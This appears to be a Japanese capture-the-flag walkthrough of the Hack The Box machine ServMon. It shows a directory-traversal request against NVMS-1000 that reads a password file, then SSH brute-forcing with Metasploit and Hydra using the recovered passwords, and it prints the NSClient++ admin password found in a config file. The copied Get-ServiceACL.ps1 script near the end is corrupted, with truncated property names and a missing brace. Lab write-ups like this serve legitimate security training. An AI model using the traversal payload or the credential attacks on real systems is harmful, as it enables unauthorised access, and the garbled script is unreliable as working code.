💨
ServMon_HTB
This Machine
概要
- ServMon は、NVMS-1000 をホストする HTTP サーバーを備えた簡単な Windows マシンです。
- (ネットワーク監視管理ソフトウェア) インスタンス。 これは LFI に対して脆弱であることが判明しています。
- これは、ユーザーのデスクトップ上のパスワードのリストを読み取るために使用されます。 認証情報を使用して SSH 接続できます
- 2 番目のユーザーとしてサーバーに接続します。 この低い特権を持つユーザーとして、システムを列挙することができます。
NSClient++ (システム監視エージェント) のパスワードを見つけます。- SSH作成後トンネルを作成すると、NSClient++ Web アプリにアクセスできます。
- アプリにはスクリプトを作成する機能が含まれています
- これは NT AUTHORITY\SYSTEM のコンテキストで実行できます。
- ユーザーに与えられたNSCP サービスを再起動する権限があり、悪意のあるスクリプトを作成した後、サービスは
再起動され、SYSTEM としてコマンドが実行されます。
SCAN
┌──(kali㉿kali)-[~]
└─$ nmap -p1-10000 -sC -sV -Pn 10.10.10.184
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-25 23:07 EST
Nmap scan report for 10.10.10.184
Host is up (0.61s latency).
Not shown: 9990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 06:35PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c71af681ca1778d027dbcd462a092b54 (RSA)
| 256 3e63ef3b6e3e4a90f34c02e940672e42 (ECDSA)
|_ 256 5a48c8cd39782129effbae821d03adaf (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6063/tcp open x11?
6699/tcp open napster?
8443/tcp open ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| iday
| Sat:Saturday
| workers
|_ jobs
| http-title: NSClient++
|_Requested resource was /index.html
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.93%I=7%D=12/25%Time=658A53EA%P=x86_64-pc-linux-gnu%r(NUL
SF:L,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/h
SF:tml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20te
SF:xt/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\
SF:x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20
SF:XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/
SF:DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\
SF:.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20
SF:\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x
SF:20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n"
SF:)%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r
SF:\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML
SF:\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/x
SF:html1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/
SF:1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\
SF:x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x2
SF:0\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(R
SF:TSPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\
SF:nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\
SF:n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201
SF:\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1
SF:-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/
SF:xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x
SF:20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20
SF:\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.93%T=SSL%I=7%D=12/25%Time=658A53F6%P=x86_64-pc-linux-g
SF:nu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocatio
SF:n:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0Sat:Saturday\0\0\x1
SF:2\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\x18\xdaL\x12")%
SF:r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocu
SF:ment\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nCont
SF:ent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"H
SF:TTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20foun
SF:d")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nD
SF:ocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -7s
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-12-26T04:20:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 820.57 seconds
- nmap評価
- ftpがアノニマスログインが有効となっているため当初ftpでのログインを試行する。
FTPログイン
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50426|)
125 Data connection already open; Transfer starting.
02-28-22 06:35PM <DIR> Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50427|)
125 Data connection already open; Transfer starting.
02-28-22 06:36PM <DIR> Nadine
02-28-22 06:37PM <DIR> Nathan
226 Transfer complete.
ftp> cd
ftp> anonymous
?Invalid command.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50428|)
125 Data connection already open; Transfer starting.
02-28-22 06:36PM 168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||50429|)
125 Data connection already open; Transfer starting.
100% |**************************| 168 0.47 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (0.29 KiB/s)
ftp> cd ../
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50430|)
125 Data connection already open; Transfer starting.
02-28-22 06:36PM 182 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
229 Entering Extended Passive Mode (|||50431|)
125 Data connection already open; Transfer starting.
100% |**************************| 182 0.49 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (0.30 KiB/s)
- getしたファイルを確認
┌──(kali㉿kali)-[~]
└─$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
- 和訳
Passwords.txt ファイルをデスクトップに残しました。 自分で編集したらこれを削除し、安全なフォルダーに戻してください。
┌──(kali㉿kali)-[~]
└─$ cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
- 評価
- Notes to do.txt には、インストールされている監視アプリの完了したタスクと未処理のタスクに関する情報が含まれています。
web access
- 通常にアクセスする。
- 評価
- デフォルトパスワードではログイン不可
- 参考:
https://www.akakagemaru.info/port/webcam-wifichange.html
- 8443にアクセス
- 評価
- 何も表示されないため別手段を検討
Burpを使用してLFIの脆弱性を確認する。
NVMSの脆弱性確認
┌──(kali㉿kali)-[~]
└─$ searchsploit nvms
------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack B | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 47774
Exploit: NVMS 1000 - Directory Traversal
URL: https://www.exploit-db.com/exploits/47774
Path: /usr/share/exploitdb/exploits/hardware/webapps/47774.txt
Codes: N/A
Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/47774.txt
┌──(kali㉿kali)-[~]
└─$ cat 47774.txt
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
POC
---------
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Burpのセッティング
- ProxyのresponceもInterceptするように設定する。
- requestと同様にチェックする
- requestと同様にチェックする
脆弱性試行
- txtと同様に施行する。
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
- win.ini ファイルは Windows インストール上に存在し、すべてのユーザーが読み取ることができるため、LFI を検証するのに適したターゲットです。
- Desktopにあると情報があったのでディレクトリトラバーサルを行う。
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
ssh試行
msfconsoleを利用する場合
- 上記のBurpで取得したPasswordや現段階で取得したUser名および一般的な名前を利用してログイン施行を行う。
┌──(kali㉿kali)-[~/ServMon]
└─$ cat passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
┌──(kali㉿kali)-[~/ServMon]
└─$ cat users.txt
Nadine
nadine
Nathan
nathan
admin
Admin
Administrator
administrator
- msfconsoleでアクセス試行
┌──(kali㉿kali)-[~/ServMon]
└─$ msfconsole -q
msf6 >
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.184
RHOSTS => 10.10.10.184
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE users.txt
USER_FILE => users.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE passwords.txt
USERPASS_FILE => passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords fo
r all users
BRUTEFORCE_SPEE 5 yes How fast to bruteforce
D , from 0 to 5
DB_ALL_CREDS false no Try each user/password
couple stored in the
current database
DB_ALL_PASS false no Add all passwords in t
he current database to
the list
DB_ALL_USERS false no Add all users in the c
urrent database to the
list
DB_SKIP_EXISTIN none no Skip existing credenti
G als stored in the curr
ent database (Accepted
: none, user, user&rea
lm)
PASSWORD no A specific password to
authenticate with
PASS_FILE passwords.txt no File containing passwo
rds, one per line
RHOSTS 10.10.10.184 yes The target host(s), se
e https://docs.metaspl
oit.com/docs/using-met
asploit/basics/using-m
etasploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a c
redential works for a
host
THREADS 1 yes The number of concurre
nt threads (max one pe
r host)
USERNAME no A specific username to
authenticate as
USERPASS_FILE passwords.txt no File containing users
and passwords separate
d by space, one pair p
er line
USER_AS_PASS false no Try the username as th
e password for all use
rs
USER_FILE users.txt no File containing userna
mes, one per line
VERBOSE false yes Whether to print outpu
t for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 10.10.10.184:22 - Starting bruteforce
[+] 10.10.10.184:22 - Success: 'Nadine:L1k3B1gBut7s@W0rk' 'Microsoft Windows [Version 10.0.17763.864]'
[*] SSH session 1 opened (10.10.16.2:35313 -> 10.10.10.184:22) at 2023-12-26 02:55:42 -0500
[+] 10.10.10.184:22 - Success: 'nadine:L1k3B1gBut7s@W0rk' 'Microsoft Windows [Version 10.0.17763.864]'
[*] SSH session 2 opened (10.10.16.2:34081 -> 10.10.10.184:22) at 2023-12-26 02:56:08 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > showsessions
[-] Unknown command: showsessions
msf6 auxiliary(scanner/ssh/ssh_login) > show sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell windows SSH kali @ 10.10.16.2:35313 -> 10.10.10.
184:22 (10.10.10.184)
2 shell windows SSH kali @ 10.10.16.2:34081 -> 10.10.10.
184:22 (10.10.10.184)
hydraを利用する場合
┌──(kali㉿kali)-[~/ServMon]
└─$ hydra -L users.txt -P passwords.txt 10.10.10.184 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-26 05:33:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 56 login tries (l:8/p:7), ~4 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: nadine password: L1k3B1gBut7s@W0rk
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-26 05:33:55
┌──(kali㉿kali)-[~/ServMon]
└─$ ssh nadine@10.10.10.184
The authenticity of host '10.10.10.184 (10.10.10.184)' can't be established.
ED25519 key fingerprint is SHA256:WctzSeuXs6dqa7LqHkfVZ38Pppc/KRlSmEvNtPlwSoQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.184' (ED25519) to the list of known hosts.
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
nadine@SERVMON C:\Users\Nadine>
Privilege Escalation
ディレクトリの調査
- Program Files に入ると、FTP ログイン中に見つかった Notes ファイルに記載されている NSClient という名前の別の興味深いディレクトリが見つかりました。
- 次に、NSClient ディレクトリの内部を見てみましょう。
PS C:\Program Files\NSClient++> gc nsclient.ini
# If you want to fill this file with all available options run the foll
owing command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
; in flight - TODO
[/settings/NRPE/server]
; Undocumented key
ssl options = no-sslv2,no-sslv3
; Undocumented key
verify mode = peer-cert
; Undocumented key
insecure = false
; in flight - TODO
[/modules]
; Undocumented key
CheckHelpers = disabled
; Undocumented key
CheckEventLog = disabled
; Undocumented key
CheckNSCP = disabled
; Undocumented key
CheckDisk = disabled
; Undocumented key
CheckSystem = disabled
; Undocumented key
WEBServer = enabled
; Undocumented key
NRPEServer = enabled
; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled
; Scheduler - Use this to schedule check commands and jobs in conjuncti
on with for instance passive monitoring through NSCA
Scheduler = enabled
; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled
; Script wrappings - A list of templates for defining script commands.
Enter any command line here and they will be expanded by scripts placed
under the wrapped scripts section. %SCRIPT% will be replaced by the ac
tual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]
; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%
; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %A
RGS%
; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (po
wershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Hos
t "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT
% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -
; External scripts - A list of scripts available to run from the CheckE
xternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]
; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]
; Undocumented key
foobar = command = foobar
; External script settings - General settings for the external scripts
module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true
- コマンドの補足
- gcコマンド:get-content コマンドレットでテキストファイルの中身を出力
- .iniファイル:INIファイルは、ソフトウェアの設定などを記録するために用いられるファイル形式の一つ。
- 構造の単純なテキストファイルであり、設定ファイルのフォーマットとしてよく使われている
nscp.exeのバージョン確認
- ExploitDBにnscpの脆弱性情報がある
Exploit DB
PS C:\Program Files\NSClient++> cmd /c "C:\Program Files\NSClient++\nsc
p.exe" --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
- NSClient は NT AUTHORITY\SYSTEM のコンテキストで実行される。
- このエクスプロイトが機能するための前提条件は、サービスの再起動です。
- Rohn Edwards によるPowerShell でサービス権限を取得する方法を示しています。
- Msxml2.XMLHTTP COM オブジェクト ダウンロード クレードルを使用して、スクリプトをメモリにダウンロードして実行できます。
- ただし、サービス コントロール マネージャーへのアクセスは拒否されるため、サービスの再起動権限を想定する必要があります。
- Get-ServiceACL.ps1
┌──(kali㉿kali)-[~/ServMon]
└─$ cat Get-ServiceACL.ps1
Add-Type @"
[System.FlagsAttribute]
public enum ServiceAccessFlags : uint
{
QueryConfig = 1,
ChangeConfig = 2,
QueryStatus = 4,
EnumerateDependents = 8,
Start = 16,
Stop = 32,
PauseContinue = 64,
Interrogate = 128,
UserDefinedControl = 256,
Delete = 65536,
ReadControl = 131072,
WriteDac = 262144,
WriteOwner = 524288,
Synchronize = 1048576,
AccessSystemSecurity = 16777216,
GenericAll = 268435456,
GenericExecute = 536870912,
GenericWrite = 1073741824,
GenericRead = 2147483648
}
"@
function Get-ServiceAcl {
[CmdletBinding(DefaultParameterSetName="ByName")]
param(
[Parameter(Mandatory=$true, Position=0, ValueFromPipeline=$true, ParameterSetName="ByName")]
[string[]] $Name,
[Parameter(Mandatory=$true, Position=0, ParameterSetName="ByDisplayName")]
[string[]] $DisplayName,
[Parameter(Mandatory=$false, Position=1)]
[string] $ComputerName = $env:COMPUTERNAME
)
# If display name was provided, get the actual service name:
switch ($PSCmdlet.ParameterSetName) {
"ByDisplayName" {
$Name = Get-Service -DisplayName $DisplayName -ComputerName $ComputerName -ErrorAction Stop |
Select-Object -ExpandProperty Name
}
}
# Make sure computer has 'sc.exe':
$ServiceControlCmd = Get-Command "$env:SystemRoot\system32\sc.exe"
if (-not $ServiceControlCmd) {
throw "Could not find $env:SystemRoot\system32\sc.exe command!"
}
# Get-Service does the work looking up the service the user requested:
Get-Service -Name $Name | ForEach-Object {
# We might need this info in catch block, so store it to a variable
$CurrentName = $_.Name
# Get SDDL using sc.exe
$Sddl = & $ServiceControlCmd.Definition "\\$ComputerName" sdshow "$CurrentName" | Where-Object { $_ }
try {
# Get the DACL from the SDDL string
$Dacl = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
}
catch {
Write-Warning "Couldn't get security descriptor for service '$CurrentName': $Sddl"
return
}
# Create the custom object with the note properties
$CustomObject = New-Object -TypeName PSObject -Property ([ordered] @{ Name = $_.Name
Dacl = $Dacl
})
# Add the 'Access' property:
$CustomObject | Add-Member -MemberType ScriptProperty -Name Access -Value {
$this.Dacl.DiscretionaryAcl | ForEach-Object {
$CurrentDacl = $_
try {
$IdentityReference = $CurrentDacl.SecurityIdentifier.Translate([System.Security.Principal.NTAccount])
}
catch {
$IdentityReference = $CurrentDacl.SecurityIdentifier.Value
}
New-Object -TypeName PSObject -Property ([ordered] @{
ServiceRights = [ServiceAccessFlags] $CurrentDacl.AccessMask
AccessControlType = $CurrentDacl.AceType
IdentityReference = $IdentityReference
IsInherited = $CurrentDacl.IsInherited
InheritanceFlags = $CurrentDacl.InheritanceFlags
PropagationFlags = $CurrentDacl.PrtionFlags
}
}
# Add 'AccessToString' property that mimics a property of ame name from normal Get-Acl call
$CustomObject | Add-Member -MemberType ScriptProperty -NamessToString -Value {
$this.Access | ForEach-Object {
"{0} {1} {2}" -f $_.IdentityReference, $_.AccessCoType, $_.ServiceRights
} | Out-String
}
$CustomObject
}
}
Discussion